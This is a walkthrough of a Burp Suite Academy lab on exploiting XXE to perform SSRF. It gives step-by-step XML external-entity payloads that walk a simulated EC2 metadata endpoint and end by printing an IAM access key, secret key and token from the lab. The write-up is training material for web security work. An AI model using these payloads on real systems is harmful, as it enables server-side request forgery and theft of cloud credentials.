Burp Suite Academy: Exploiting XXE to perform SSRF attacksBurp Suite Academy

This lab has a «Check stock» feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.

If we check this Check stock functionality with Burp we can see the request we are doing:

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Using a payload like: <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://<target>"> ]> the external entity will cause the server to make a back-end HTTP request to the target.

We will need to adapt then the xml request to:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

You get the response:

<...>

"Invalid product ID: 
latest
"

This response should be giving us a target server folder, so we can try:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<...>

"Invalid product ID: 
meta-data
"

Again: 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<...>

"Invalid product ID: 
iam
"

Again: 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/iam"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<...>

"Invalid product ID: 
security-credentials
"

Again: 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/iam/security-credentials"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>


<...>

"Invalid product ID: 
admin
"

Again: 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<...>

"Invalid product ID: 
{
  "Code" : "Success",
  "LastUpdated" : "2023-07-29T08:44:38.281132118Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "Gedq18PMudjPpJqY62aQ",
  "SecretAccessKey" : "LKqw1GJmF6SRMhgDnhOdZOyuc5liB14SEcn7E1jY",
  "Token" : "4do0e0R59ouywoyXyLu5yjPCr2t7F3bgTdpHFBgTn2FrZvfQaww863LHPUUOKs5XsyT8sHTtCCCEVmTiZozuVnmj7ynKT6vk2LXLQtlKl1DXjQZOMvmbDeM8ucX3X56CNUmeQ8RqsmmiEei8GLUc7w1GL4bXKDRuPtiupurE7jJBht1M3sQsRMpWskGqJA6yw6G5qEO9GPil9vKR3bCqMc0NSrFkTYQ8xc1IgxnvK0QxR7DoJJnj1h2nqQgtYFOb",
  "Expiration" : "2029-07-27T08:44:38.281132118Z"
}
"